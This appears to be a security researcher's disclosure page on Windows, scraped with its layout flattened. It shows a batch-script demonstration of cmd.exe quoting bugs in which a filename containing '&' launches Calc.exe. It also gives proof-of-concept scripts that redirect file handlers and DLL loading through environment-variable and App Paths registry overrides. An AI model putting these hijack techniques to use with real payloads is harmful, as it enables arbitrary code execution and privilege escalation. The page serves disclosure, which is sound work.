%SystemRoot%\system32\imageres.dll,-112 {A9B48EAC-3ED8-11d2-8216-00C04FB687DA} %SystemRoot%\System32\DATACLEN.DLL,-2000 {ADB9F5A4-E73E-49b8-99B6-2FA317EF9DBC} %SystemRoot%\system32\themeui.dll,7 {AFDB1F70-2A4C-11d2-9039-00C04F8EEB3E} %SystemRoot%\System32\cscui.dll {B12AE898-D056-4378-A844-6D393FE37956} %SystemRoot%\system32\themeui.dll,7 {B4BFCC3A-DB2C-424C-B029-7FE99A87C641} %SystemRoot%\system32\imageres.dll,-183 {B4FB3F98-C1EA-428d-A78A-D1F5659CBA93} %SystemRoot%\system32\imageres.dll,-1013 {B7BBD408-F09C-4aa8-B65E-A00B8FE0F0B9} %SystemRoot%\system32\themeui.dll,7 {B98A2BEA-7D42-4558-8BD1-832F41BAC6FD} %SystemRoot%\System32\sdcpl.dll,-1 {BA126E01-2166-11D1-B1D0-00805FC1270E} %SystemRoot%\system32\netshell.dll {BA126F01-2166-11D1-B1D0-00805FC1270E} %SystemRoot%\system32\netshell.dll {BB06C0E4-D293-4f75-8A90-CB05B6477EEE} %SystemRoot%\System32\imageres.dll,-149 {BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6} %SystemRoot%\System32\ActionCenterCPL.dll,-1 {BC48B32F-5910-47F5-8570-5074A8A5636A} %SystemRoot%\System32\SyncCenter.dll,-1000 {BD7A2E7B-21CB-41b2-A086-B309680C6B7E} %systemroot%\system32\mssvp.dll,-505 {BD84B380-8CA2-1069-AB1D-08000948F534} %SystemRoot%\System32\fontext.dll {c57a6066-66a3-4d91-9eb9-41532179f0a5} %SystemRoot%\system32\imageres.dll,-1020 {C58C4893-3BE0-4B45-ABB5-A63E4B8C8651} %SystemRoot%\System32\DiagCpl.dll,-1 {c79d1575-b8c6-4862-a284-788836518b97} %SystemRoot%\system32\display.dll,1 {d0da2915-3f89-4519-a4ca-5e02528c8ec4} %SystemRoot%\system32\playlistfolder.dll {D17D1D6D-CC3F-4815-8FE3-607E7D5D10B3} %SystemRoot%\System32\Speech\SpeechUX\sapi.cpl,-138 {D2035EDF-75CB-4EF1-95A7-410D9EE17170} dlnashext.dll,-200 {D20EA4E1-3957-11d2-A40B-0C5020524153} %SystemRoot%\System32\imageres.dll,-114 {d3162b92-9365-467a-956b-92703aca08af} %SystemRoot%\system32\imageres.dll,-112 {D3E34B21-9D75-101A-8C3D-00AA001A1652} %systemroot%\system32\mspaint.exe,-3 Paint.Picture {D4480A50-BA28-11d1-8E75-00C04FA31A86} %SystemRoot%\System32\shwebsvc.dll,-107 {d450a8a1-9568-45c7-9c0e-b4f9fb4537bd} appwiz.cpl,-1507 {D555645E-D4F8-4c29-A827-D93C859C4F2A} %SystemRoot%\System32\accessibilitycpl.dll,-1 {D9EF8727-CAC2-4e60-809E-86F80A666C91} %SystemRoot%\System32\fvecpl.dll,-1 {daf95313-e44d-46af-be1b-cbacea2c3065} %SystemRoot%\system32\SearchFolder.dll,-323 {E2E7934B-DCE5-43C4-9576-7FE4F75E7480} %SystemRoot%\System32\timedate.cpl,-50 {e345f35f-9397-435c-8f95-4e922c26259e} %SystemRoot%\system32\SearchFolder.dll,-323 {E413D040-6788-4C22-957E-175D1C513A34} %SystemRoot%\System32\SyncCenter.dll,-1000 {E44E5D18-0652-4508-A4E2-8A090067BCB0} %SystemRoot%\system32\imageres.dll,-24 {E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31} %SystemRoot%\system32\zipfldr.dll CompressedFolder {E96F5460-09CE-4f46-88B1-F4B6B4A8E252} %SystemRoot%\system32\wmploc.dll, 101 {ECF03A32-103D-11d2-854D-006008059367} %SystemRoot%\system32\imageres.dll,-1002 {ED7BA470-8E54-465E-825C-99712043E01C} %SystemRoot%\System32\imageres.dll,-27 {ED834ED6-4B5A-4bfe-8F11-A626DCB6A921} %SystemRoot%\System32\themecpl.dll,-1 {F02C1A0D-BE21-4350-88B0-7367FC96EF3C} %SystemRoot%\System32\imageres.dll,-25 {F1390A9A-A3F4-4E5D-9C5F-98F3BD8D935C} %SystemRoot%\System32\SyncCenter.dll,-1000 {F20DA720-C02F-11CE-927B-0800095AE340} %SystemRoot%\system32\packager.dll,0 Package {F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D} %SystemRoot%\System32\mmsys.cpl,-100 {F5078F40-C551-11D3-89B9-0000F81FE221} %SystemRoot%\System32\msxml3.dll,0 xmlfile {F6B6E965-E9B2-444B-9286-10C9152EDBC5} %SystemRoot%\System32\FileHistory.exe {F82DF8F7-8B9F-442E-A48C-818EA735FF9B} %SystemRoot%\System32\tabletpc.cpl,-10201 {f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a} %SystemRoot%\system32\imageres.dll,-189 {FF3AE31D-55B0-4945-BDE9-622ABB334C1A} %SystemRoot%\system32\WABSyncProvider.dll,0 ComponentId ProgId ToolBoxBitmap32 {04a1e553-fe36-4fde-865e-344194e69424} msinkaut.InkPicture.1 %CommonProgramFiles%\Microsoft Shared\Ink\InkObj.dll, 212 {289228DE-A31E-11D1-A19C-0000F875B132} ListPad.ListPad.1 cic.dll, 1 {44F9A03B-A3EC-4F3B-9364-08E0007F21DF} Control.TaskSymbol.1 mmcndmgr.dll, 101 {545AE700-50BF-11D1-9FE9-00600832DB4A} MMCCtrl.MMCCtrl.1 cic.dll, 1 {5828227c-20cf-4408-b73f-73ab70b8849f} RdpCoreTS.WRdsProtocolManager.1 %windir%\system32\rdpcorets.dll, 1 {6BF52A52-394A-11d3-B153-00C04F79FAA6} WMPlayer.OCX.7 %SystemRoot%\system32\wmploc.dll, 101 {850D1D11-70F3-4BE5-9A11-77AA6B2BB201} WIA.CommonDialog.1 %SystemRoot%\System32\wiaaut.dll, 102 {888D5481-CABB-11D1-8505-00A0C91F9CA0} VideoRenderCtl.VideoRenderCtl.1 qdvd.dll, 1 {9BA05971-F6A8-11CF-A442-00A0C90A8F39} Shell.FolderView.1 %SystemRoot%\system32\shell32.dll, 260 {AEB84C83-95DC-11D0-B7FC-B61140119C4A} DiskManagement.Control %SystemRoot%\System32\dmview.ocx,1 {B0395DA5-6A15-4E44-9F36-9A9DC7A2F341} MMC.IconControl.1 mmcndmgr.dll, 1 {C3701884-B39B-11D1-9D68-00C04FC30DF6} OlePrn.OleInstall.1 %SystemRoot%\system32\oleprn.dll, 1 {C47195EC-CD7A-11D1-8EA3-00C04F9900D7} SysColorCtrl.SysColorCtrl.1 cic.dll, 1 {E1C5D730-7E97-4D8A-9E42-BBAE87C2059F} WIA.DeviceManager.1 %SystemRoot%\System32\wiaaut.dll, 103
Calc.exe
and
Windows Shell Obsolete APIs
ShUnimpl.dll
as
indicators and execute them instead of either the application or the
DLL associated with
the exploited file extension.
Note:
ShUnimpl.dll
is the
graveyard
for obsolete and now unimplemented functions of
Windows’ shell
from prior versions of
Windows NT; to inhibit their use, its
_DllMainCRTStartup()
entry point function intentionally returns FALSE
and
lets the Win32 function
LoadLibrary()
fail with Win32 error code 1114 alias
ERROR_DLL_INIT_FAILED
.
The error message box displayed from
RunDLL32.exe
is therefore
expected and used here to show the pathname of the
spoofed
DLL.
Note: the command line
START ‹filename›.‹extension›
is equivalent to a double-click on the file
‹filename›.‹extension›
.
Note: the command lines can be copied and pasted as blocks into the Command Processor window!
Start the Command Processor, create a
new directory, for example %SystemDrive%\Sloppy\
, then
create 8 (empty) files TMP Calc
, TMP%Calc
,
TMP!Calc
, TMP^Calc
, TMP;Calc
,
TMP,Calc
, TMP=Calc
and
TMP&Calc
in this directory:
MKDIR "%SystemDrive%\Sloppy" FOR %? IN (" " "%" "!" "^^" ";" "," "=" "&") DO @COPY NUL: "%SystemDrive%\Sloppy\TMP%~?Calc"
1 file(s) copied. … 1 file(s) copied.
Create the text file
Sloppy.cmd
with the following content in the directory created in step 1.:
@Rem Copyleft © 2001-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
@SetLocal EnableDelayedExpansion EnableExtensions
@Echo Command Line:
@Echo !CMDCMDLINE!
@Echo.
@Echo Arguments:
@Echo %%* "%*"
@If Not "%~0" == "" Echo %%0 "%~0"
@If Not "%~1" == "" Echo %%1 "%~1"
@If Not "%~2" == "" Echo %%2 "%~2"
@If Not "%~3" == "" Echo %%3 "%~3"
@If Not "%~4" == "" Echo %%4 "%~4"
@If Not "%~5" == "" Echo %%5 "%~5"
@If Not "%~6" == "" Echo %%6 "%~6"
@If Not "%~7" == "" Echo %%7 "%~7"
@If Not "%~8" == "" Echo %%8 "%~8"
@If Not "%~9" == "" Echo %%9 "%~9"
@Pause
@Exit /B
Note: the batch script Sloppy.cmd
displays the command line and its arguments.
Open the directory created in step 1. in
File Explorer, then select the 8
files TMP?Calc
created in step 1., drag them onto
the batch script Sloppy.cmd
created in step 2.,
and drop them to execute it with all 8 file(name)s as arguments:
Command Line: C:\Windows\system32\cmd.exe /c ""C:\Sloppy\Sloppy.cmd" C:\Sloppy\TMP=Calc "C:\Sloppy\TMP Calc" C:\Sloppy\TMP!Calc C:\Sloppy\TMP%Calc C:\Sloppy\TMP&Calc C:\Sloppy\TMP,Calc C:\Sloppy\TMP;Calc C:\Sloppy\TMP^Calc" Arguments: %* "C:\Sloppy\TMP=Calc "C:\Sloppy\TMP Calc" C:\Sloppy\TMP\Sloppy\TMP%Calc C:\Sloppy\TMP" %0 "C:\Sloppy\Sloppy.cmd" %1 "C:\Sloppy\TMP" %2 "Calc" %3 "C:\Sloppy\TMP Calc" %4 "C:\Sloppy\TMPCalc" %5 "C:\Sloppy\TMP%Calc" %6 "C:\Sloppy\TMP" Press any key to continue . . .OUCH¹: File Explorer fails to enclose arguments in (double) quotes
"
unless they contain a
space, exposing multiple bugs of the
Command Processor
Cmd.exe
here:
%*
, the argument
C:\Sloppy\TMP!Calc
is truncated at the exclamation mark
!
, then joined with the
following arguments’ C:\Sloppy\TMP%Calc
part
after the colon :
;
C:\Sloppy\TMP=Calc
is split at the equal
sign =
;
C:\Sloppy\TMP!Calc
is echoed without the
exclamation mark !
;
ECHO
command, the
ampersand &
in the argument
C:\Sloppy\TMP&Calc
is interpreted as command
delimiter which aborts the batch script and starts
Calc.exe
as soon as you
press any key…!
Deselect the file TMP&Calc
, then drag and drop the
remaining 7 files onto the batch script Sloppy.cmd
to
execute it with these 7 file(name)s as arguments:
Command Line: C:\Windows\system32\cmd.exe /c ""C:\Sloppy\Sloppy.cmd" C:\Sloppy\TMP=Calc "C:\Sloppy\TMP Calc" C:\Sloppy\TMP!Calc C:\Sloppy\TMP%Calc C:\Sloppy\TMP,Calc C:\Sloppy\TMP;Calc C:\Sloppy\TMP^Calc" Arguments: %* "C:\Sloppy\TMP=Calc "C:\Sloppy\TMP Calc" C:\Sloppy\TMP\Sloppy\TMP%Calc C:\Sloppy\TMP,Calc C:\Sloppy\TMP;Calc C:\Sloppy\TMPCalc" %0 "C:\Sloppy\Sloppy.cmd" %1 "C:\Sloppy\TMP" %2 "Calc" %3 "C:\Sloppy\TMP Calc" %4 "C:\Sloppy\TMPCalc" %5 "C:\Sloppy\TMP%Calc" %6 "C:\Sloppy\TMP" %7 "Calc" %8 "C:\Sloppy\TMP" %9 "Calc" Press any key to continue . . .OUCH²: the unquoted arguments expose more bugs of the Command Processor: the arguments
C:\Sloppy\TMP,Calc
and
C:\Sloppy\TMP^Calc
are split at comma
,
and semicolon
;
.
Start the batch script Sloppy.cmd
with all 8 properly
quoted and escaped fully qualified pathnames as arguments:
CHDIR /D "%SystemRoot%\Sloppy" START Sloppy.cmd "%CD%\TMP=Calc" "%CD%\TMP Calc" "%CD%\TMP!Calc" "%CD%\TMP%Calc" "%CD%\TMP,Calc" "%CD%\TMP;Calc" "%CD%\TMP^^Calc" "%CD%\TMP&Calc"
Command Line: C:\Windows\system32\cmd.exe /c ""C:\Sloppy\Sloppy.cmd" "C:\Sloppy\TMP=Calc" "C:\Sloppy\TMP Calc" "C:\Sloppy\TMP!Calc" "C:\Sloppy\TMP%Calc" "C:\Sloppy\TMP,Calc" "C:\Sloppy\TMP;Calc" "C:\Sloppy\TMP^Calc" "C:\Sloppy\TMP&Calc"" Arguments: %* ""C:\Sloppy\TMP=Calc" "C:\Sloppy\TMP Calc" "C:\Sloppy\TMPCalc" "C:\Sloppy\TMP%Calc" "C:\Sloppy\TMP,Calc" "C:\Sloppy\TMP;Calc" "C:\Sloppy\TMPCalc" "C:\Sloppy\TMP %0 "C:\Sloppy\Sloppy.cmd" %1 "C:\Sloppy\TMP=Calc" %2 "C:\Sloppy\TMP Calc" %3 "C:\Sloppy\TMPCalc" %4 "C:\Sloppy\TMP%Calc" %5 "C:\Sloppy\TMP,Calc" %6 "C:\Sloppy\TMP;Calc" %7 "C:\Sloppy\TMPCalc" %8 "C:\Sloppy\TMP&Calc" Press any key to continue . . .OUCH³: while echoing the quoted variable
"%*"
starts
Calc.exe
now due to the
double (double) quotes "
,
the quoted arguments "%CD%\TMP=Calc"
,
"%CD%\TMP,Calc"
and
"%CD%\TMP;Calc"
are not
splitted any more, but the exclamation mark
!
and the escaped circumflex
^^
are still lost!
Finally start the Command Processor
with the batch script Sloppy.cmd
and at least another
argument, all fully qualified and properly quoted:
"%COMSPEC%" /C "%CD%\Sloppy.cmd" "%CD%\TMP Calc"
'C:\Sloppy\Sloppy.cmd" "C:\Sloppy\TMP Calc' is not recognized as an internal or external command, operable program or batch file.OUCH⁴: if the first and the last argument following the
/C
or /K
command line switch
are both quoted, the remainder of the command line is interpreted as
single argument, the (path)name of a command or a
batch script!
REM Copyleft © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de> CHDIR /D "%USERPROFILE%" SET SystemRoot=%SystemRoot%\System32\Calc.exe * SET SystemRoot COPY NUL: Desktop\Sloppy.cer START Desktop\Sloppy.cer RENAME Desktop\Sloppy.cer Sloppy.hlp START Desktop\Sloppy.hlp RENAME Desktop\Sloppy.hlp Sloppy.log START Desktop\Sloppy.log RENAME Desktop\Sloppy.log Sloppy.msc START Desktop\Sloppy.msc RENAME Desktop\Sloppy.msc Sloppy.webpnp START Desktop\Sloppy.webpnp … ERASE Desktop\Sloppy.*
SystemRoot=C:\Windows\System32\Calc.exe * 1 file(s) copied.
REM Copyleft © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de> CHDIR /D "%USERPROFILE%" SET SystemRoot=%SystemRoot%\System32\Calc.exe^" ^"* SET SystemRoot COPY NUL: Desktop\Sloppy.msu START Desktop\Sloppy.msu RENAME Desktop\Sloppy.msu Sloppy.rle START Desktop\Sloppy.rle RENAME Desktop\Sloppy.rle Sloppy.spc START Desktop\Sloppy.spc RENAME Desktop\Sloppy.spc Sloppy.wsh START Desktop\Sloppy.wsh … ERASE Desktop\Sloppy.*
SystemRoot=C:\Windows\System32\Calc.exe" "* 1 file(s) copied.
REM Copyleft © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de> CHDIR /D "%USERPROFILE%" SET CommonProgramFiles=%SystemDrive% SET CommonProgramFiles MKDIR "%CommonProgramFiles%\System\OLE DB" COPY "%SystemRoot%\System32\ShUnimpl.dll" "%CommonProgramFiles%\System\OLE DB\OLEDB32.dll" COPY NUL: Desktop\Sloppy.udl START Desktop\Sloppy.udl RMDIR /Q /S "%CommonProgramFiles%\System" SET ProgramFiles=%SystemDrive% SET ProgramFiles MKDIR "%ProgramFiles%\Windows Photo Viewer" COPY "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll" RENAME Desktop\Sloppy.udl Sloppy.tif START Desktop\Sloppy.tif ERASE Desktop\Sloppy.tif RMDIR /Q /S "%ProgramFiles%\Windows Photo Viewer"
CommonProgramFiles=C: CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files 1 file(s) copied. ProgramFiles=C: ProgramFiles(x86)=C:\Program Files (x86) 1 file(s) copied.
REM Copyleft © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de> CHDIR /D "%USERPROFILE%" REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\IExplore.exe" /VE /T REG_SZ /D "%SystemRoot%\System32\Calc.exe" /F COPY NUL: Desktop\Sloppy.xrm-ms START Desktop\Sloppy.xrm-ms ERASE Desktop\Sloppy.xrm-ms REG.EXE DELETE "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\IExplore.exe" /F
The operation completed successfully. 1 file(s) copied. The operation completed successfully.
REM Copyleft © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de> CHDIR /D "%USERPROFILE%" REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\WordPad.exe" /VE /T REG_SZ /D "%SystemRoot%\System32\Calc.exe" /F WRITE.EXE EXPLORER.EXE /E,/Select,"%SystemRoot%\Write.exe" ECHO 1) Right-click the selected file 'Write.exe' to display its context menu; ECHO 2) Click the 'Run as Administrator' menu entry; SET /P = 3) Press [Return] when done! REG.EXE DELETE "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\WordPad.exe" /F
The operation completed successfully. 1) Right-click the selected file 'Write.exe' to display its context menu; 2) Click the 'Run as Administrator' menu entry; 3) Press [Return] when done! The operation completed successfully.
Use the X.509 certificate to send S/MIME encrypted mail.
Note: email in weird format and without a proper sender name is likely to be discarded!
I dislike
HTML (and even
weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your
nickname.
I abhor top posts and expect inline quotes in replies.
as iswithout any warranty, neither express nor implied.
cookiesin the web browser.
The web service is operated and provided by
Telekom Deutschland GmbH The web service provider stores a session cookie
in the web
browser and records every visit of this web site with the following
data in an access log on their server(s):